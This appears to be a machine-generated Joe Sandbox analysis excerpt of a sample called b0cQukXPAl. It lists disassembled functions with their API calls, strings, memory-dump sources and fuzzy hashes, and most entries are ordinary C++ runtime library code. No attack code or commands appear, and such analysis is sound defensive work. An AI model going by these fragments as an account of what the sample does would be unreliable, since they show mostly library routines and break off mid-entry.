LoadLibraryW.KERNEL32(advapi32.dll,?,0210F218,00000004,02107D77,00000004,02108059,?,02108789,?,00000008,02107FFD,00000000,?,?,00000000), ref: 0210EF05
GetProcAddress.KERNEL32(00000000,00447430), ref: 0210EF1B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF31
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF48
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF5F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF76
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF8D

Strings

advapi32.dll, xrefs: 0210EEE3, 0210EEE8, 0210EF04

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
Instruction ID: 64d1e74f507df79fab840c7bf88a861a9edae06108fb11beb7a435e26b16a392
Opcode Fuzzy Hash: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
Instruction Fuzzy Hash: 22217CB1944750BFEB106FB59C48B5ABFA8EF05B16F104A2AF541D3651CBBCC4408BA8

Function 0210EEB5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0210F218,00000004,02107D77,00000004,02108059), ref: 0210EEE9
GetLastError.KERNEL32(?,0210F218,00000004,02107D77,00000004,02108059,?,02108789,?,00000008,02107FFD,00000000,?,?,00000000,?), ref: 0210EEF5
LoadLibraryW.KERNEL32(advapi32.dll,?,0210F218,00000004,02107D77,00000004,02108059,?,02108789,?,00000008,02107FFD,00000000,?,?,00000000), ref: 0210EF05
GetProcAddress.KERNEL32(00000000,00447430), ref: 0210EF1B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF31
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF48
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF5F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF76
GetProcAddress.KERNEL32(00000000,00000000), ref: 0210EF8D

Strings

advapi32.dll, xrefs: 0210EEE3, 0210EEE8, 0210EF04

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
Instruction ID: 8ab5f052716a63c18d1d636bc01543c4470e7d9f517b8089acda472081750b27
Opcode Fuzzy Hash: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
Instruction Fuzzy Hash: 92218EB1944750BFE7106FA59C48B5ABFACEF05B16F004A2AF541D3651CBBCD4408BA8

Function 02102497 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021066FB), ref: 021024A6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021024B4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021024C2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021066FB), ref: 021024F0
GetProcAddress.KERNEL32(00000000), ref: 021024F7
GetLastError.KERNEL32(?,?,?,021066FB), ref: 02102512
GetLastError.KERNEL32(?,?,?,021066FB), ref: 0210251E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02102534
__CxxThrowException@8.LIBVCRUNTIME ref: 02102542

Strings

kernel32.dll, xrefs: 021024A0, 021024A5, 021024EA

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
Instruction ID: e67d5619c14fae7247b07d8f3cc6dfc40b983bf66c8c89846b82b135b4adab1d
Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
Instruction Fuzzy Hash: 581182759403107FE7117B756CDDAAB7AACAD46B127200536FC01D21D1EFB8D5008A6C

Function 0042483D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856

Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424888
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042494C

Strings

switchState, xrefs: 00424872
pContext, xrefs: 00424936

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798

Function 00419736 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
DuplicateHandle.KERNEL32(00000000), ref: 00419769
SafeRWList.LIBCONCRT ref: 00419788

Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
Part of subcall function 00417757: List.LIBCMT ref: 00417772

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
GetLastError.KERNEL32 ref: 004197A9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197CD

Strings

eventObject, xrefs: 00419792

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D

Function 02110C16 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02110C26
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02110C8D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02110CAA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02110D10
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02110D25
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02110D37
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02110D65
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02110D70
__CxxThrowException@8.LIBVCRUNTIME ref: 02110D9C
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02110DAC

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
Instruction ID: 0b350a601927fb86fc7d49cf90c6c54be7be71b486255eccc4c01c9482b68496
Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
Instruction Fuzzy Hash: D541A030E842489ECF14FFA484947ED77A66F49304F1440B9DE4A6B2C2CBB65A45DF62

Function 00431DD6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DEA

Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482

_free.LIBCMT ref: 00431DF6
_free.LIBCMT ref: 00431E01
_free.LIBCMT ref: 00431E0C
_free.LIBCMT ref: 00431E17
_free.LIBCMT ref: 00431E22
_free.LIBCMT ref: 00431E2D
_free.LIBCMT ref: 00431E38
_free.LIBCMT ref: 00431E43
_free.LIBCMT ref: 00431E51

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88

Function 0212203D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02122051

Part of subcall function 021236C1: HeapFree.KERNEL32(00000000,00000000,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?), ref: 021236D7
Part of subcall function 021236C1: GetLastError.KERNEL32(?,?,0212A34F,?,00000000,?,00000000,?,0212A5F3,?,00000007,?,?,0212A9E7,?,?), ref: 021236E9

_free.LIBCMT ref: 0212205D
_free.LIBCMT ref: 02122068
_free.LIBCMT ref: 02122073
_free.LIBCMT ref: 0212207E
_free.LIBCMT ref: 02122089
_free.LIBCMT ref: 02122094
_free.LIBCMT ref: 0212209F
_free.LIBCMT ref: 021220AA
_free.LIBCMT ref: 021220B8

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 61ce71404217e7b64208c14f88956554617f072f274d433c417aad1cac3f76c7
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 42116076940118BFCB01EF94C845CD93FAAEF14350B5188A5BA188B271DB35EB799F80

Function 0042E1A2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1CE
__cftoe.LIBCMT ref: 0042E200

Strings

<(@, xrefs: 0042E219, 0042E1B0
<(@, xrefs: 0042E24E, 0042E1BC, 0042E251

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: __cftoe
String ID: <(@$<(@
API String ID: 4189289331-1745028333
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D

Function 0043EE92 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5

Strings

log10, xrefs: 0043EEFF, 0043EF4F
exp, xrefs: 0043EF7A, 0043EFDC
sqrt, xrefs: 0043F039
asin, xrefs: 0043F021
log, xrefs: 0043EF5B, 0043EF67
pow, xrefs: 0043EF99, 0043F045, 0043F058
acos, xrefs: 0043F02D

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E

Function 02123180 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: b7d10a73e0a146a97fb826d9e6dbf02760de353f91211a2eadcf288312bf924d
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: 54C1E170E84399AFCB15DFA8C844BAEBBB5AF09310F0440D5F924A7292C7389959CF61

Function 00428CAD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D00
FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D19
FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D20
PMDtoOffset.LIBCMT ref: 00428D3F

Strings

Bad dynamic_cast!, xrefs: 00428D81

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: FindInstanceTargetType$Offset
String ID: Bad dynamic_cast!
API String ID: 1467055271-2956939130
Opcode ID: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
Instruction ID: f58e39392761fe45c588d51cd7f0347041c183eb1b6093b38bd943e8a3a40f23
Opcode Fuzzy Hash: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
Instruction Fuzzy Hash: 16214972B022259FDB04DF65FD02AAE77A4EF54714B50411FF900932C1DF38E90586A9

Function 004054C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
int.LIBCPMT ref: 004054F0

Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D

std::locale::_Getfacet.LIBCPMT ref: 004054F9
std::_Facet_Register.LIBCPMT ref: 0040552A
std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
__CxxThrowException@8.LIBVCRUNTIME ref: 0040555E

Strings

X_, xrefs: 004054E7, 00405537

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID: X_
API String ID: 2243866535-618661828
Opcode ID: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
Opcode Fuzzy Hash: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C

Function 0210C6B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0210C6CC
atomic_compare_exchange.LIBCONCRT ref: 0210C6F0
std::_Cnd_initX.LIBCPMT ref: 0210C701
std::_Cnd_initX.LIBCPMT ref: 0210C70F

Part of subcall function 020F1370: __Mtx_unlock.LIBCPMT ref: 020F1377

std::_Cnd_initX.LIBCPMT ref: 0210C71F

Part of subcall function 0210C3DF: __Cnd_broadcast.LIBCPMT ref: 0210C3E6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0210C72D

Strings

d#D, xrefs: 0210C6B2

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: d#D
API String ID: 4258476935-2139572230
Opcode ID: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
Instruction ID: 6be6ae762c351ff20999247227878aafcf7dde2be923e5fadba9b5fa32f78f73
Opcode Fuzzy Hash: 5abf2091e9ef3c120a03ce8f27c2dce0f0e4d4679916a690eb1c806f1cbcb468
Instruction Fuzzy Hash: 3401F271980601ABCB20BB608DC8B9DB35BBF04310F144112E905976C0EBF8EB149ED1

Function 00432124 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D928,0042D928,?,?,?,00432375,00000001,00000001,23E85006), ref: 0043217E
__alloca_probe_16.LIBCMT ref: 004321B6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432375,00000001,00000001,23E85006,?,?,?), ref: 00432204
__alloca_probe_16.LIBCMT ref: 0043229B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004322FE
__freea.LIBCMT ref: 0043230B

Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9

__freea.LIBCMT ref: 00432314
__freea.LIBCMT ref: 00432339

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
Instruction ID: ba832ad7ebe863b589d8a86c2aeb799e0d63014e0688505fe86a97fbdbb1aa79
Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
Instruction Fuzzy Hash: DA51F572600216AFDB249F71DD41EAF77A9EB48754F14462AFD04E7240DBBCDC408668

Function 02121119 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02122131: GetLastError.KERNEL32(?,?,0211A9DC,?,00000000,?,0211CDD6,020F2474,00000000,?,00451F20), ref: 02122135
Part of subcall function 02122131: _free.LIBCMT ref: 02122168
Part of subcall function 02122131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021221A9

_free.LIBCMT ref: 02121434
_free.LIBCMT ref: 0212144D
_free.LIBCMT ref: 0212147F
_free.LIBCMT ref: 02121488
_free.LIBCMT ref: 02121494

Strings

C, xrefs: 02121281

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: e4ee9f438ee70ef96292a6c8590ced5c2bd5d5ae82cab3c1d35fd60a9d1ce425
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 99B12875A41229AFDB24DF28C884BADB7B5FF08314F5045AAE90DA7351D731AEA4CF40

Function 00439E9E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F0D
_free.LIBCMT ref: 00439F1B
_free.LIBCMT ref: 0043A049
_free.LIBCMT ref: 0043A054

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: 375e79c53d3bcaca8bdb11d34ea16f93cbcffeb35ab56cd023e7f34feda17694
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 2361F271D00205AFEB20DF69C842B9ABBF4EF0D710F14516BE888EB382E7759D418B59

Function 0212A105 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0212A174
_free.LIBCMT ref: 0212A182
_free.LIBCMT ref: 0212A2B0
_free.LIBCMT ref: 0212A2BB

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: b1f51d5cf3490497739ce17978df4b3f251af9cba7ae3fddbf3f8fc5d40af2cd
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: 4361D271D40225AFDB20DF68C841B9ABBF5FF05720F2441AAF854EB391DB31A965CB90

Function 00433873 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C22D,E0830C40,?,?,?,?,?,?,00433FE8,0040DDCB,0042C22D,?,0042C22D,0042C22D,0040DDCB), ref: 004338B5
__fassign.LIBCMT ref: 00433930
__fassign.LIBCMT ref: 0043394B
WideCharToMultiByte.KERNEL32(?,00000000,0042C22D,00000001,?,00000005,00000000,00000000), ref: 00433971
WriteFile.KERNEL32(?,?,00000000,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 00433990
WriteFile.KERNEL32(?,0040DDCB,00000001,00433FE8,00000000,?,?,?,?,?,?,?,?,?,00433FE8,0040DDCB), ref: 004339C9

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
Instruction ID: 0fd517cfdcf2aa173ba8fdea846c20396cfd97c89b6f08fd2475e7b61059f896
Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
Instruction Fuzzy Hash: 7751C470E002099FCB20DFA8D845BEEBBF4EF09701F14412BE556E7291E774AA41CB69

Function 02123ADA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0211C494,E0830C40,?,?,?,?,?,?,0212424F,020FE032,0211C494,?,0211C494,0211C494,020FE032), ref: 02123B1C
__fassign.LIBCMT ref: 02123B97
__fassign.LIBCMT ref: 02123BB2
WideCharToMultiByte.KERNEL32(?,00000000,0211C494,00000001,?,00000005,00000000,00000000), ref: 02123BD8
WriteFile.KERNEL32(?,?,00000000,0212424F,00000000,?,?,?,?,?,?,?,?,?,0212424F,020FE032), ref: 02123BF7
WriteFile.KERNEL32(?,020FE032,00000001,0212424F,00000000,?,?,?,?,?,?,?,?,?,0212424F,020FE032), ref: 02123C30

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
Instruction ID: cd7cb9e6906b6fd494483cb3fa59928c52c9c2a38f05712d09b48fc866ac68de
Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
Instruction Fuzzy Hash: 5751C274900209AFCB14CFA8DC84BEEBBB8EF09700F14416AF965E7291D73499A5CB60

Function 004286C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286EB
